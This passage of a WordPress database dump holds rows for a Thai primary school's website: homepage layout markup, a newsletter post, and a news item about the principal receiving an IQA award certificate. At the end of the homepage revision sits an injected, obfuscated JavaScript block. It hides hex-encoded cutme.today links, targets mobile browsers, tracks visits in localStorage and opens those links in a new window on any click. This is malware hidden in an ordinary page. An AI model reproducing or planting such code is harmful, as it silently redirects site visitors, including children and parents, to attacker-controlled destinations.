class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-08 13:15:20','2025-07-08 06:15:20','',14,'http://pakhaeng.ssk.in.th/?p=1764',0,'revision','',0),
(1765,1,'2025-07-08 14:22:05','2025-07-08 07:22:05','<!-- wp:image {\"id\":1766,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/11-68-724x1024.png\" alt=\"\" class=\"wp-image-1766\"/></figure>\n<!-- /wp:image -->','วารสาร 11/2568','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3-11-2568','','','2025-07-08 14:22:07','2025-07-08 07:22:07','',0,'http://pakhaeng.ssk.in.th/?p=1765',0,'post','',0),
(1766,1,'2025-07-08 14:21:38','2025-07-08 07:21:38','','11-68','','inherit','','closed','','11-68','','','2025-07-08 14:21:38','2025-07-08 07:21:38','',1765,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/11-68.png',0,'attachment','image/png',0),
(1767,1,'2025-07-08 14:22:05','2025-07-08 07:22:05','<!-- wp:image {\"id\":1766,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/11-68-724x1024.png\" alt=\"\" class=\"wp-image-1766\"/></figure>\n<!-- /wp:image -->','วารสาร 11/2568','','inherit','closed','closed','','1765-revision-v1','','','2025-07-08 14:22:05','2025-07-08 07:22:05','',1765,'http://pakhaeng.ssk.in.th/?p=1767',0,'revision','',0),
(1768,1,'2025-07-08 14:23:45','2025-07-08 07:23:45','<!-- wp:paragraph -->\n<p>เมื่อวันที่ 7 กรกฎาคม พ.ศ.2568 นางเสน่หา พลโสภา เข้าร่วมประชุมผู้บริหารสถานศึกษา เพื่อรับฟังข้อราชการ ณ สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 และในการนี้ ได้รับมอบเกียรติบัตรจากสำนักงานเขตพื้นที่การศึกษา โดยนายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 เป็นผู้มอบให้แก่ โรงเรียนบ้านหนองปลาเข็ง-กอไหล่ ว่าเป็นสถานศึกษาที่มีระบบและกลไกทางการบริหารจัดการคุณภาพและมาตรฐานการศึกษาเพื่อการประเมินคุณภาพการศึกษา ได้รับรางวัล IQA AWARD ระดับชมเชย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1769,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320170_0-1024x881.jpg\" alt=\"\" class=\"wp-image-1769\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1773,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320171_0-1024x770.jpg\" alt=\"\" class=\"wp-image-1773\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1772,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320172_0-984x1024.jpg\" alt=\"\" class=\"wp-image-1772\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1770,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320173_0-960x1024.jpg\" alt=\"\" class=\"wp-image-1770\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1771,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320174_0-947x1024.jpg\" alt=\"\" class=\"wp-image-1771\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','การประชุมผู้บริหารสถานศึกษาและรับมอบเกียรติบัตร IQA award','','publish','closed','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99','','','2025-07-08 14:23:47','2025-07-08 07:23:47','',0,'http://pakhaeng.ssk.in.th/?p=1768',0,'post','',0),
(1769,1,'2025-07-08 14:23:14','2025-07-08 07:23:14','','320170_0','','inherit','','closed','','320170_0','','','2025-07-08 14:23:14','2025-07-08 07:23:14','',1768,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320170_0.jpg',0,'attachment','image/jpeg',0),
(1770,1,'2025-07-08 14:23:15','2025-07-08 07:23:15','','320173_0','','inherit','','closed','','320173_0','','','2025-07-08 14:23:15','2025-07-08 07:23:15','',1768,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320173_0.jpg',0,'attachment','image/jpeg',0),
(1771,1,'2025-07-08 14:23:15','2025-07-08 07:23:15','','320174_0','','inherit','','closed','','320174_0','','','2025-07-08 14:23:15','2025-07-08 07:23:15','',1768,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320174_0.jpg',0,'attachment','image/jpeg',0),
(1772,1,'2025-07-08 14:23:15','2025-07-08 07:23:15','','320172_0','','inherit','','closed','','320172_0','','','2025-07-08 14:23:15','2025-07-08 07:23:15','',1768,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320172_0.jpg',0,'attachment','image/jpeg',0),
(1773,1,'2025-07-08 14:23:15','2025-07-08 07:23:15','','320171_0','','inherit','','closed','','320171_0','','','2025-07-08 14:23:15','2025-07-08 07:23:15','',1768,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/320171_0.jpg',0,'attachment','image/jpeg',0),
